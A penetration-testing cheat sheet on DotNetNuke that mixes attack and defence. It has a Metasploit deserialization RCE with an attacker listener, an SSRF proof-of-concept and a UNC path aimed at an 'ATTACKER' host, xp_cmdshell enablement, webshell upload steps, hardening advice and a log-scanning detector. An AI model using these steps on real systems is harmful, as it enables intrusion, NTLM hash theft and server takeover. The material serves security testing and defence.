# DotNetNuke (DNN)
{{#include ../../banners/hacktricks-training.md}}
## DotNetNuke (DNN)
If you log in as **administrator** in DNN it is easy to obtain **RCE**; however, a number of *unauthenticated* and *post-auth* techniques have also been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.
---
## Version & Environment Enumeration
* Check the *X-DNN* HTTP response header; it usually discloses the exact platform version.
* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users.
* Typical cookies you will see on a live instance:
  * `.DOTNETNUKE`: the ASP.NET forms authentication ticket.
  * `DNNPersonalization`: contains XML/serialized user profile data (on old versions this is the deserialization sink, see the RCE below).
---
## Unauthenticated Exploitation
### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)
*Affected versions ≤ 9.3.0-RC*
`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.
```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST <attacker_ip>
msf> run
```
The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works **without authentication** on 7.x to 9.1.x, and requires a *verified* low-privilege account on 9.2.x+.
### 2. Server-Side Request Forgery (CVE-2025-32372)
*Affected versions < 9.13.8. Patch released April 2025.*
A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF). Practical impacts:
* Internal port scan / metadata service discovery in cloud deployments.
* Reach hosts otherwise firewalled from the Internet.
Proof-of-concept (replace `TARGET` & `ATTACKER`):
```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```
The request is triggered in the background; monitor your listener for callbacks.
### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)
*Affected versions 6.0.0 to 9.x (< 10.0.1)*
Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`. Windows will happily perform NTLM negotiation, leaking the server account's NTLM hashes to the attacker. Upgrade to **10.0.1** or block outbound SMB at the firewall.
### 4. IP Filter Bypass (CVE-2025-52487)
If administrators rely on *Host/IP Filters* to protect the admin portal, be aware that in versions prior to **10.0.1** the filter can be bypassed by manipulating the `X-Forwarded-For` header when DNN sits behind a reverse proxy.
---
## Post-Authentication to RCE
### Via SQL console
Under **`Settings → SQL`** a built-in query window allows queries to be executed against the site database. On Microsoft SQL Server, if the DNN database login has sysadmin rights, you can enable **`xp_cmdshell`** and spawn commands:
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```
### Via ASPX webshell upload
1. Go to **`Settings → Security → More → More Security Settings`**.
2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
4. Trigger it at **`/Portals/0/shell.aspx`**.
---
## Privilege Escalation on Windows
Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:
* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
* **Juicy/Sharp Potatoes** to escape *Service Accounts*.
---
## Hardening Recommendations (Blue Team)
* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues).
* Remove residual **`InstallWizard.aspx*`** files after installation.
* Disable outbound SMB (ports 445/139) egress.
* Enforce strong *Host Filters* on the edge proxy rather than within DNN.
* Block access to `/API/RemoteContentProxy` if unused.
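As an added defensive example (not part of the original page), the following Python scans constructed IIS-style log lines for three indicators tied to the issues above: `RemoteContentProxy` requests whose target is outside a hypothetical allow-list or points at an internal address, server-side scripts requested from under `/Portals/`, and hits on the installer path. The field layout, the allow-list and the sample entries are assumptions.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed IIS-style log lines: date time c-ip method uri-stem uri-query status.
SAMPLE_LOG = """\
2025-05-01 10:00:01 203.0.113.5 GET /Default.aspx - 200
2025-05-01 10:00:05 203.0.113.5 GET /API/RemoteContentProxy url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F 200
2025-05-01 10:00:09 203.0.113.5 GET /API/RemoteContentProxy url=https%3A%2F%2Fcdn.example.com%2Flogo.png 200
2025-05-01 10:01:12 198.51.100.9 GET /Portals/0/shell.aspx cmd=whoami 200
2025-05-01 10:02:30 198.51.100.9 GET /Install/Install.aspx mode=install 200
2025-05-01 10:03:00 192.0.2.7 GET /Portals/0/Images/logo.png - 200
"""

# Hypothetical allow-list of hosts the content proxy legitimately fetches from.
ALLOWED_PROXY_HOSTS = {"cdn.example.com"}
# Server-side script extensions that should never be served from the upload tree.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")

def is_internal(host: str) -> bool:
    """True for loopback/private/link-local targets (e.g. cloud metadata at 169.254.169.254)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local

def classify(line: str) -> list:
    """Return finding labels for one log line; an empty list means nothing suspicious."""
    _date, _time, _client, _method, stem, query, _status = line.split()
    stem_l, findings = stem.lower(), []
    if stem_l == "/api/remotecontentproxy":
        # parse_qs percent-decodes the value, so the proxied URL can be split directly.
        host = urlsplit(parse_qs(query).get("url", [""])[0]).hostname or ""
        if host not in ALLOWED_PROXY_HOSTS or is_internal(host):
            findings.append(f"ssrf-candidate:{host}")
    if stem_l.startswith("/portals/") and stem_l.endswith(SCRIPT_EXTENSIONS):
        findings.append("script-under-portals")  # webshell dropped via allowable-extension change
    if stem_l.startswith("/install/"):
        findings.append("install-wizard-reachable")  # residual installer files still served
    return findings

def scan(log_text: str) -> list:
    """Return (client_ip, uri_stem, findings) for every flagged line in the log."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        findings = classify(line) if len(parts) == 7 else []
        if findings:
            hits.append((parts[2], parts[4], findings))
    return hits
```

Feed real W3C log lines to `scan()` after mapping your own field order onto the seven columns assumed here; an allow-list miss on the proxy endpoint is the highest-value alert of the three.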
## References
* Metasploit `dnn_cookie_deserialization_rce` module documentation (GitHub): practical unauthenticated RCE details.
* GitHub Security Advisory GHSA-3f7v-qx94-666m (2025): SSRF bypass and patch information.
{{#include ../../banners/hacktricks-training.md}}